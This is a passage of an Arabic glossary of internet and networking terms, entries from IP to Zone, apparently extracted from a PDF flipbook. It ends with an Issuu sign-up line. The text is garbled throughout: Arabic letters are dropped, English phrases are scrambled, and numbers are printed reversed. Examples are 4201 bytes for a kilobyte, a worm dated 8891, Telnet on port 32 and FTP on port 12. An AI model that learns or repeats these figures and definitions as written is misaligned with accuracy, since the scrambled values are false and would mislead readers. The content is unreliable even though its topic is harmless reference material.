IP‬بروتوكول النترنت‪ ‬‬ ‫‪ Protocol Internet‬ھو طبقة الشبكة الخاصة بحاشیة بروتوكول ‪TCP/IP‬‬ ‫والتي تستخدمھا الدوات على النترنت للتصال ببعضھا‪ .‬والـ ‪ IP‬‬ ‫‪) Address‬عنوان بروتوكول النترنت) ھ و العنوان الخاص بكل كمبیوتر‪ ‬‬ ‫متصل بشبكة ولكل عنوان الـ‪ IP‬طريقتین للكتابة اما رقمیة (‪ TCP/IP‬‬ ‫‪ 375‬‬ ‫‪ (Address‬مثل ‪ 3.66.62.212‬أو حرفیة (‪ (FQDN‬وھي العناوين التي‪ ‬‬ ‫نكتبھا عادة في المتصفحات مثل ‪ ftp.empac.co.uk‬والعنوان الحقیقي‪ ‬‬ ‫ھو الرقمي ولكن لصعوبة حفظه فنكتب العنوان الحرفي ولكن في‪ ‬‬ ‫الشبكة داخلی ً يتم ترجمة العنوان الحرفي الى العنوان الرقمي‪ ‬‬ ‫ا‪ ‬‬ ‫المطابق له‪ .‬‬ ‫‪ ­ ISP‬مقدم خدمة النترنت‪ ‬‬


‫‪ Provider Internet Service‬ھو الشركة التي يقوم المستخدم ‪ -‬عادة ‪ -‬‬ ‫بالشتراك لديھا للحصول على ربط بالنترنت‪ ،‬وھذه الشركة مرتبطة‪ ‬‬ ‫بالنترنت مباشرة من احدى الشركات العضاء في ‪ .CIX‬‬ ‫‪ (J‬‬ ‫‪ JPEG‬‬ ‫وسیلة لضغط الصور المستخدمة في النترنت‪ ‬‬ ‫‪ (K‬‬ ‫‪ ­ Kilobit‬كیلو بت‪ ‬‬ ‫وحدة قیاس تعادل ‪ 4201‬ب‪ ,‬وتستخدم عادة في تحديد الطاقة‪ ‬‬ ‫الستیعابیة للذاكرة‪ ‬‬ ‫‪ ­ Kilobyte‬كیلو بايت‪ ‬‬ ‫وحدة قیاس تعادل ‪ 4201‬بايت‪ .‬‬ ‫‪ (L‬‬ ‫‪ ­ Layer‬طبقة‪ ‬‬ ‫شبكات الكمبیوتر قد تنظم على شكل مجموعة أعداد أكثر أو أقل من‪ ‬‬ ‫البروتوكولت المستقلة كل منھا في طبقة ‪ Layer‬وقد تسمى مستوى‬ ‫‪ .Level‬‬ ‫‪ ­ Login‬تسجیل‪ ‬‬ ‫‪ 475‬‬ ‫أي أن تقوم بتسجیل اسمك كمستخدم لنظام أو شبكة فیصبح لديك‪ ‬‬ ‫اسم مستخدم ‪ .Name Login‬‬ ‫‪ ­ Log off‬انھاء عملیة التسجیل‪ ‬‬ ‫ھو اخبار النظام بانك أنھیت عملك وستقطع الرتباط‪ .‬‬ ‫‪ ­ Lurking‬التواري‪ ‬‬ ‫يستخدم ھ ذا المصطلح للتعبیر عن شخص لیس لديه مشاركة نشطة‬ ‫في مجموعة الخبار او لوحة النقاش أو قائمة البريد التي اشترك‪ ‬‬ ‫معھ ا‪ ،‬ويفضل التواري للشخاص المبتدئین الذين يريدون التأقلم في‪ ‬‬ ‫البداية مع الخرينز‪ ‬‬ ‫‪ (M‬‬ ‫‪ ­ Mailing List‬قائمة بريد‪ ‬‬ ‫قائمة بعناوين الكترونیة لعدة أشخاص‪ .‬كل شخص مشترك في ھذه‪ ‬‬ ‫القائمة يرسل موضوع ً يخص اھتمامات ھذه القائمة الى كمبیوتر‪ ‬‬ ‫ا‪ ‬‬ ‫رئیسي يقوم بتحويل ھ ذه الرسالة الى جمیع المشتركین في القائمة‬ ‫البريدية‪ ،‬ھناك قوائم معدلة ‪ Moderated‬وتعني أن الرسالة ترسل في‬ ‫البداية الى صاحب ھذ ه القائمة لیدقق فیھا واذا تأكد من صلحیتھا‪ ‬‬ ‫يقوم بارساله للبقیة وھناك قوائم غیر معدلة ‪ Unmoderated‬وتقوم‪ ‬‬ ‫بارسال الرسالة أتوماتیكی ً للمشتركین‪ .‬‬ ‫ا‪ ‬‬ ‫‪ ­ Megabyte‬میجا بايت‪ ‬‬ ‫وحدة قیاس تعادل ‪ 4201‬كیلو بايت أو ‪ 6758401‬بايت‪ .‬‬ ‫‪ ­ MIME‬توصیلة بريد النترنت المتعددة الغراض‪ ‬‬ ‫‪ Internet Mail Extension Multipurpose‬نظام لتوفیر القدرة على نقل‪ ‬‬ ‫البیانات غیر النصیة كالصور والصوت والفاكس من خلل البريد‪ ‬‬ ‫اللكتروني‪ .‬‬ ‫‪ 575‬‬ ‫‪ (N‬‬ ‫‪ ­ Netiquette‬آداب الشبكات‪ ‬‬ ‫اللتزام بقواعد سلوك ملئمة عند استخدام الشبكة‪ ‬‬ ‫‪ ­ NETBIOS‬نظام شبكة المدخلت والمخرجات الساسي‪ ‬‬


‫‪ Input/Output System Network Basic‬يسمح للجھزة التي تعمل بنظام‪ ‬‬ ‫‪ DOS‬من التحدث مع واستعمال خدمات الشبكة‪ .‬نفس السم ھو اسم‬ ‫بروتوكول شبكة محلیة يستخدم بشكل واسع في منتجات‪ ‬‬ ‫میكروسوفت‪ .‬‬ ‫‪ ­ Newsgroup‬مجموعة أخبار‪ ‬‬ ‫ا‬ ‫مجموعات الخبار التي قد يصل عددھا الى ‪ 000.61‬مجموعة تكون مع ً‬ ‫الـ‪ ،Usenet‬وھ ي بمثابة الصحف التي تناقش جمیع موضوعات الحیاة‪ ‬‬ ‫وأي موضوع قد يخطر ببالك‪ ،‬ومعظم موفري الخدمة يوجد لديھم موفر‬ ‫مجموعات أخبار ‪ .Newsgroup Server‬‬ ‫‪ (O‬‬ ‫‪ ­ On­Line/Off­Line‬متصل‪/‬غیر متصل‪ ‬‬ ‫‪ On­Line‬تعني أن الكمبیوتر متصل حالی ً بالشبكة وعكسه ‪ Off­Line‬أي‬ ‫ا‪ ‬‬ ‫غیر متصل‪ .‬‬ ‫‪ (P‬‬ ‫‪ ­ PING‬مجمع كتلة النترنت‪ ‬‬ ‫‪ Grouper Packet InterNet‬برنامج يستخدم لختبار القدرة الوصولیة‪ ‬‬ ‫وذلك بارسال طلب صدى ‪ ICMP‬الیھا وانظار الرد‪ ‬‬ ‫‪ 675‬‬ ‫‪ ­ PPP‬بروتوكول نقطة الى نقطة‪ ‬‬ ‫‪ Point­to­Point Protocol‬إحدى وسیلتین لتبادل كتل البیانات عبر انترنت‬ ‫بواسطة خطوط الھاتف ( الوسیلة الخرى ھي ‪ (SLIP‬بروتوكول ‪ PPP‬‬ ‫يوفر وسیلة ضغط للبیانات وتصحیح الخطاء وليزال تحت التطوير‪ .‬‬ ‫‪ ­ POP‬بروتوكول مكتب البريد‪ ‬‬ ‫‪ Protocol Post Office‬يسمح للمستخدم بتخزين رسائله في كمبیوتر‪ ‬‬ ‫شركة توفیر الخدمة كي يقوم باسترجاعھا فیما بعد‪ ،‬وھناك ثلث‪ ‬‬ ‫طبعات لھذا النظام ‪ POP‬و ‪2 POP‬و ‪ 3.POP‬‬ ‫‪ ­ Port‬میناء (منفذ)‪ ‬‬ ‫تحديد موقع برنامج معین على كمبیوتر مضیف على النترنت‪ ..‬قبل‪ ‬‬ ‫سنوات قلیلة كان على المستخدم تحديد البورت بنفسه؛ المنفذ ‪ 32‬‬ ‫خاص بالـ ‪ Telnet‬والمنفذ ‪ 12‬خاص بالـ‪ ،FTP‬أما الیوم فمعظم البرامج‪ ‬‬ ‫تحدد المنفذ اتوماتیكی ً‪ .‬‬ ‫ا‪ ‬‬ ‫‪ ­ Proxy‬تفويض‪ ‬‬ ‫طريقة يقوم بمقتضاھا جھاز ‪ -‬موجه غالب ً ‪ -‬بالرد على طلبات للدخول‬ ‫ا‪ ‬‬ ‫على مواقع معینة وبذلك يقوم بتنفیذ ھذا الطلب بناء على الوامر‪ ‬‬ ‫التي تلقاھا وعلى التوجیه الذي ُ ِ َ علیه‪ .‬‬ ‫صمم‪ ‬‬ ‫‪ (Q‬‬ ‫‪ ­ Queue‬صف‪ ‬‬ ‫كتل احتیاطیة تنتظر المعالجة‪ ‬‬ ‫‪ (R‬‬ ‫‪ ­ RAM‬ذاكرة الدخول العشوائي‪ ‬‬ ‫‪ 775‬‬ ‫‪ Memory Random ­ Access‬الجزء من ذاكرة الكمبیوتر الذي يقوم بتخزين‬ ‫المعلومات بصفة مؤقتة بینما ھي تحت الستخدام ‪ .‬أغلب‪ ‬‬ ‫الكمبیوترات تحتوي على ‪ KB 215‬من ذاكرة الرام‪ ،‬ھذه المعلومات اذا‪ ‬‬ ‫أغلقت الجھاز ولم تحفظھا تختفي الى البد‪ .‬‬


‫‪ ­ Remote‬بعید‪ ‬‬ ‫ليمكن ربطه مباشرة باستخدام أسلك محلیة ولكنه يحتاج الى أدوات‬ ‫اتصال‪ .‬‬ ‫‪ ­ Router‬موجه‪ ‬‬ ‫نظام كمبیوتر يتخذ القرارات الخاصة بتحديد اتجاھات الحركة على‪ ‬‬ ‫النترنت‪ .‬‬ ‫‪ (S‬‬ ‫‪ ­ SLIP‬بروتوكول النترنت ذو الخط المتسلسل‪ ‬‬ ‫‪ Internet Protocol Serial Line‬ھو بروتوكول يستخدم لتشغیل بروتوكول‬ ‫النترنت ‪ IP‬على خطوط متسلسلة ‪ Serial Lines‬كدوائر الھاتف‪ .‬عادة‪ ‬‬ ‫عند الرتباط بموفر خدمة يستخدم اما ‪ PPP‬أو ‪ .SLIP‬‬ ‫‪ ­ Server‬خادم (موفر)‪ ‬‬ ‫جھ از يفتح للمستخدمین لتوفیر الخدمات لھم كنقل الملفات وغیرھا‪ ..‬‬ ‫الشخص الذي يدخل على الـ‪ Server‬يسمى ‪ Client‬‬ ‫‪ ­ Shell‬المحارة‪ ‬‬ ‫برنامج يوفر للمستخدم القدرة على التفاعل مع الكمبیوتر‪ .‬‬ ‫‪ ­ SMTP‬بروتوكول نقل البريد البسیط‪ ‬‬ ‫بروتوكول يستخدم لنقل البريد اللكتروني بین الجھزة‪ .‬‬ ‫‪ ­ Spamming‬التعمیم‪ ‬‬ ‫‪ 875‬‬ ‫مصطلح يطلق على عملیة تعمیم رسالة في مجموعات الخبار أو‪ ‬‬ ‫البريد اللكتروني‪ .‬ويقابله التطھیر ‪ .Flaming‬‬ ‫‪ ­ Standard‬معیار (افتراضي)‪ ‬‬ ‫مجموعة من المواصفات لتصمیم البرامج يتم العتراف بھا من قبل‪ ‬‬ ‫بائعین أو منظمة رسمیة‪ .‬‬ ‫‪ (T‬‬ ‫‪ 1T‬‬ ‫مصطلح ‪ T&AT‬يعبر عن وسائل النقل الرقمیة ‪ Digital‬التي تستخدم‪ ‬‬ ‫لنقل ‪ DS-1‬الشارات الرقمیة المشكلة وذلك بسرعة ‪ MB 5.1‬في‪ ‬‬ ‫الثانیة (سرعة خارقة) وذلك باستخدام خط مؤجر ‪ Line Leased‬وھناك‪ ‬‬ ‫أيض ً ‪3 T‬التي تستخدم لنقل ‪ DS-3‬بسرعة ‪ MB 647.44‬في الثانیة‪ .‬ا‪ ‬‬ ‫‪ ­ TCP‬بروتوكول التحكم بالنقل‪ ‬‬ ‫يقوم ھ ذا البروتوكول بتمرير المعلومات الى بروتوكول النترنت ‪ IP‬وھو‬ ‫مسئول عن التأكد من وصول الرسالة وأنھا مفھومة‪ .‬‬ ‫‪ ­ Telenet‬التصال عن بعد‪ ‬‬ ‫‪ Telnet‬ھي بروتوكول انترنت معیاري لخدمات الربط عن بعد ويسمح‪ ‬‬ ‫للمستخدم بربط جھازه على كمبیوتر مضیف جاع ً جھازه وكأنه جزء‪ ‬‬ ‫ل‪ ‬‬ ‫من ذلك الكمبیوتر البعید‪ .‬‬ ‫‪ ­ Trojan Horse‬حصان طروادة‪ ‬‬ ‫برنامج كمبیوتر يحمل داخله وسائل تسمح لمكونه الدخول الى النظام‬ ‫الذي ُ ِ َ فیه‪ .‬‬ ‫زرع‪ ‬‬ ‫‪ ­ URL‬معین المصادر المنتظم‪ ‬‬ ‫‪ 975‬‬ ‫‪ Locator Uniform Resourse‬وسیلة معیارية للشارة للمصادر تقوم‪ ‬‬ ‫بتحديد نوع الخدمة بالضافة الى موقع الملف أو الدلیل‪ .‬‬ ‫‪ ­ Unix‬نظام يونیكس‪ ‬‬ ‫نظام تشغیل تستخدمه معظم شركات توفیر الخدمة ويقوم بربط عدة‬ ‫أجھزة تابعة ‪ Clients‬به للدخول علیه‪ .‬‬


‫‪ ­ Usenet‬شبكة المستخدم‪ ‬‬ ‫شبكة من مجموعات الخبار تتكون من ‪ 000.61‬مجموعة أخبار تھتم‪ ‬‬ ‫بجمیع شؤون الحیاة‪ .‬‬ ‫‪ (V‬‬ ‫‪ ­ Virus‬فیروس‪ ‬‬ ‫برنامج يكرر ويضاعف نفسه عن طريق دمج نفسه بالبرامج الخرى‪ ‬‬ ‫ويضر الكمبیوتر كثیًر‪ .‬‬ ‫ا‪ ‬‬ ‫‪ (W‬‬ ‫‪ ­ White Pages‬الصفحات البیضاء‪ ‬‬ ‫مراكز معلومات توفر خدمات ومعلومات عن أشخاص معینین‪ .‬‬ ‫‪ Whois‬‬ ‫برنامج يتیح لمستخدمه البحث في مراكز المعلومات عن أشخاص‪ ‬‬ ‫وعناوين‪ .‬‬ ‫‪ WAIS‬‬ ‫نظام يتیح لمستخدمه البحث عن موضوع معین باستخدام كلمات‪ ‬‬ ‫مفتاحیة ‪ .Keywords‬‬ ‫‪ 085‬‬ ‫‪ Winsock‬‬ ‫نظام التقاء في ويندوز‪ ،‬واذا أردت الدخول على النترنت فیجب أن‪ ‬‬ ‫يتوفر لديك ملف يدعى ‪ winsock.dll‬موضوع داخل النظام‪ .‬المشكلة‪ ‬‬ ‫التي تتكرر كثیًر ھ ي أنه لیس جمیع البرامج تعمل مع نفس طبعة‪ ‬‬ ‫ا‪ ‬‬ ‫‪ winsock‬تطبیق ‪ trumpet‬الذي يستعمله الكثیرون يستخدم لتوفیر ربط‬ ‫‪ SLIP‬بین حاسباتھ موتقوم النترنت بتوفیر نسخة من ‪ .winsock‬‬ ‫‪ ­ WWW‬الشبكة العنكبوتیة العالمیة‪ ‬‬ ‫برنامج يعمل باستخدام نقاط ربط ‪ Hybertext link‬كي يتمكن‪ ‬‬ ‫المستخدم من التصفح بواسطة النقر على الروابط‪ .‬‬ ‫‪ ­ Worm‬دودة‪ ‬‬ ‫برنامج يكرر نفسه ولكنه يتكاثر في الشبكة بشكل مقصود بعكس‪ ‬‬ ‫الفیروسات‪ ،‬دود النترنت الذي حدث عام ‪ 8891‬ربما يكون الشھر فقد‬ ‫استطاع الدود أن يتكاثر في أكثر من ‪ 0006‬نظام‪ .‬‬ ‫‪ ­ WYSIWYG‬ماتراه ھو ماتحصل علیه‪ ‬‬ ‫‪ What You Get What You See Is‬ھومصطلح يطلق على بعض برامج‪ ‬‬ ‫تصمیم صفحات الويب التي تتیح رؤية ماستكون الصفحة علیه من‪ ‬‬ ‫خلل البرنامج نفسه‪ .‬‬ ‫‪ (X‬‬ ‫‪ Modem ­ X‬‬ ‫بروتوكول يستخدم لنقل الملفات بین حاسبین عادة بواسطة مودم‪ .‬‬ ‫‪ (Y‬‬ ‫‪ 185‬‬ ‫‪ ­ Yellow Pages‬الصفحات الصفراء‪ ‬‬ ‫خدمة تستخدم بواسطة اداريي ‪ UNIX‬بغرض ادارة مراكز المعلومات‬ ‫الموزعة عبر الشبكة‪ .‬‬ ‫‪ Modem ­ Y‬‬ ‫بروتوكول يستخدم لنقل الملفات بین حاسبین عادة بواسطة مودم‪.‬‬ ‫‪ (Z‬‬ ‫‪ Modem ­ Z‬‬ ‫بروتوكول يستخدم لنقل الملفات بین حاسبین عادة بواسطة مودم‪.‬‬ ‫‪ ­ Zone‬نطاق‪ ‬‬


‫مجموعة من أدوات الشبكة ‪ .Apple Talk‬‬ ‫‪ 285‬‬


Issuu converts static files into: digital portfolios, online yearbooks, online catalogs, digital photo albums and more. Sign up and create your flipbook.